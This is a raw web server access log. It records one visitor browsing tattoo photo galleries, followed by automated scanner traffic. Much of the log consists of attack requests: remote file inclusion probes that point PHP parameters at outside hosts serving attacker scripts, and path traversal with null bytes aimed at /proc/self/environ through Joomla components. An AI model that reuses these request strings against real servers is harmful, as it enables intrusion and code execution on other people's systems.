67.142.171.29 - - [24/May/2010:19:24:31 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:31 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:31 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:31 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:31 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:31 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:31 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:31 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:33 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:33 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:50 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:50 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:50 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:50 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:50 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:50 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:50 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:50 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:50 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:50 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:50 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:52 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:52 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:52 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:52 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:52 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:52 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:52 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:52 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:54 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:54 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:25:08 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:25:08 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:25:08 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:25:08 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:25:09 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:25:09 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:25:09 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
77.222.56.62 - - [24/May/2010:19:25:27 -0500] "GET //addevent.inc.php?agendax_path=http://pkill.interfree.it/id.jpg?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
77.222.56.62 - - [24/May/2010:19:25:27 -0500] "GET /logs//addevent.inc.php?agendax_path=http://pkill.interfree.it/id.jpg?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:28:38 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_myblog&Itemid=10&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:28:39 -0500] "GET /index2.php?option=com_myblog&Itemid=10&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:28:40 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=10&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:29:47 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_myblog&Itemid=17&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:29:47 -0500] "GET /index2.php?option=com_myblog&Itemid=17&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:29:47 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=17&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
77.79.246.241 - - [24/May/2010:19:30:37 -0500] "GET //step_one.php?server_inc=http://pastie.org/924179.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.808"
87.117.220.133 - - [24/May/2010:19:30:54 -0500] "GET /logs//com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.820"
87.117.220.133 - - [24/May/2010:19:30:54 -0500] "GET //com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 318 "-""libwww-perl/5.820"
207.46.13.90 - - [24/May/2010:19:31:01 -0500] "GET /logs/access_log.1235520000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.34.169.238 - - [24/May/2010:19:31:09 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_myblog&Itemid=19&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:31:09 -0500] "GET /index2.php?option=com_myblog&Itemid=19&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:31:09 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_myblog&Itemid=18&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:31:09 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=19&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:31:09 -0500] "GET /index2.php?option=com_myblog&Itemid=18&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:31:10 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=18&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.108.66.144 - - [24/May/2010:19:31:38 -0500] "GET //step_one.php?server_inc=http://pastie.org/924179.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.812"
207.46.13.136 - - [24/May/2010:19:32:01 -0500] "GET /logs/access_log.1162857600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.79.246.241 - - [24/May/2010:19:32:31 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
89.108.66.144 - - [24/May/2010:19:33:18 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.812"
64.34.169.238 - - [24/May/2010:19:33:44 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_myblog&Itemid=20&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:33:44 -0500] "GET /index2.php?option=com_myblog&Itemid=20&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:33:45 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=20&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.108.66.144 - - [24/May/2010:19:37:52 -0500] "GET /logs/access_log.1271894400//step_one.php?server_inc=http://pastie.org/924179.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.812"
89.108.66.144 - - [24/May/2010:19:37:52 -0500] "GET //step_one.php?server_inc=http://pastie.org/924179.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.812"
89.108.66.144 - - [24/May/2010:19:37:53 -0500] "GET /logs//step_one.php?server_inc=http://pastie.org/924179.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
77.79.246.241 - - [24/May/2010:19:38:39 -0500] "GET /logs/access_log.1271894400//step_one.php?server_inc=http://pastie.org/924179.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.808"
77.79.246.241 - - [24/May/2010:19:38:39 -0500] "GET //step_one.php?server_inc=http://pastie.org/924179.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.808"
77.79.246.241 - - [24/May/2010:19:38:40 -0500] "GET /logs//step_one.php?server_inc=http://pastie.org/924179.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
87.117.220.133 - - [24/May/2010:19:40:07 -0500] "GET /logs/access_log.1271894400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-""libwww-perl/5.820"
67.195.112.180 - - [24/May/2010:19:41:29 -0500] "GET /logs/access_log.1184025600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.108.66.144 - - [24/May/2010:19:41:55 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.812"
64.34.169.238 - - [24/May/2010:19:42:32 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=17&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:42:32 -0500] "GET /index.php?option=com_myblog&Itemid=17&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:42:32 -0500] "GET /logs/index.php?option=com_myblog&Itemid=17&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.79.246.241 - - [24/May/2010:19:43:18 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
91.192.168.241 - - [24/May/2010:19:44:39 -0500] "GET /logs/access_log.1271894400//SSI.php?sourcedir=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:19:44:39 -0500] "GET //SSI.php?sourcedir=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:19:44:39 -0500] "GET /logs//SSI.php?sourcedir=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:19:45:03 -0500] "GET /logs//SSI.php?sourcedir=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:19:45:03 -0500] "GET /logs/access_log.1271894400//SSI.php?sourcedir=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:19:45:03 -0500] "GET //SSI.php?sourcedir=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:19:45:26 -0500] "GET /logs/access_log.1271376000//SSI.php?sourcedir=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
87.250.255.243 - - [24/May/2010:19:45:30 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.100.58.76 - - [24/May/2010:19:46:02 -0500] "GET /logs/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
208.100.58.76 - - [24/May/2010:19:46:02 -0500] "GET /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
91.192.168.241 - - [24/May/2010:19:46:05 -0500] "GET /logs/access_log.1271376000//SSI.php?sourcedir=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
64.34.169.238 - - [24/May/2010:19:46:25 -0500] "GET /logs/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:46:25 -0500] "GET /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
77.79.246.241 - - [24/May/2010:19:46:31 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
77.79.246.241 - - [24/May/2010:19:46:31 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
77.79.246.241 - - [24/May/2010:19:46:31 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
208.100.58.76 - - [24/May/2010:19:47:01 -0500] "GET /logs/index2.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
208.100.58.76 - - [24/May/2010:19:47:01 -0500] "GET /index2.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
64.34.169.238 - - [24/May/2010:19:47:37 -0500] "GET /logs/index2.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:47:37 -0500] "GET /index2.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.79.246.241 - - [24/May/2010:19:48:16 -0500] "GET /logs/access_log.1273017600//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
208.100.58.76 - - [24/May/2010:19:49:30 -0500] "GET /logs/?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6908 "-""libwww-perl/5.831"
208.100.58.76 - - [24/May/2010:19:49:30 -0500] "GET /?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
67.195.112.180 - - [24/May/2010:19:49:31 -0500] "GET /logs/access_log.1239321600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.185 - - [24/May/2010:19:50:01 -0500] "GET /logs/access_log.1266537600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.34.169.238 - - [24/May/2010:19:50:43 -0500] "GET /logs/index2.php?option=com_jmsitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:50:43 -0500] "GET /index2.php?option=com_jmsitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
208.100.58.76 - - [24/May/2010:19:50:44 -0500] "GET /logs/index2.php?option=com_jmsitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
208.100.58.76 - - [24/May/2010:19:50:44 -0500] "GET /index2.php?option=com_jmsitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
64.34.169.238 - - [24/May/2010:19:50:51 -0500] "GET /logs/?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6908 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:50:51 -0500] "GET /?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
208.100.58.76 - - [24/May/2010:19:51:02 -0500] "GET /logs/index2.php?option=com_jmsitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
208.100.58.76 - - [24/May/2010:19:51:02 -0500] "GET /index2.php?option=com_jmsitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
64.34.169.238 - - [24/May/2010:19:51:06 -0500] "GET /logs/index2.php?option=com_jmsitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:51:06 -0500] "GET /index2.php?option=com_jmsitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.55.51.117 - - [24/May/2010:19:51:09 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.51.117 - - [24/May/2010:19:52:08 -0500] "GET /logs/access_log.1207526400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.192.168.241 - - [24/May/2010:19:52:08 -0500] "GET //SSI.php?sourcedir=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:19:52:08 -0500] "GET /logs/access_log.1271894400//SSI.php?sourcedir=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:19:52:08 -0500] "GET /logs//SSI.php?sourcedir=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:19:52:27 -0500] "GET /logs/access_log.1271376000//SSI.php?sourcedir=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
207.46.13.41 - - [24/May/2010:19:52:31 -0500] "GET /logs/access_log.1158796800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
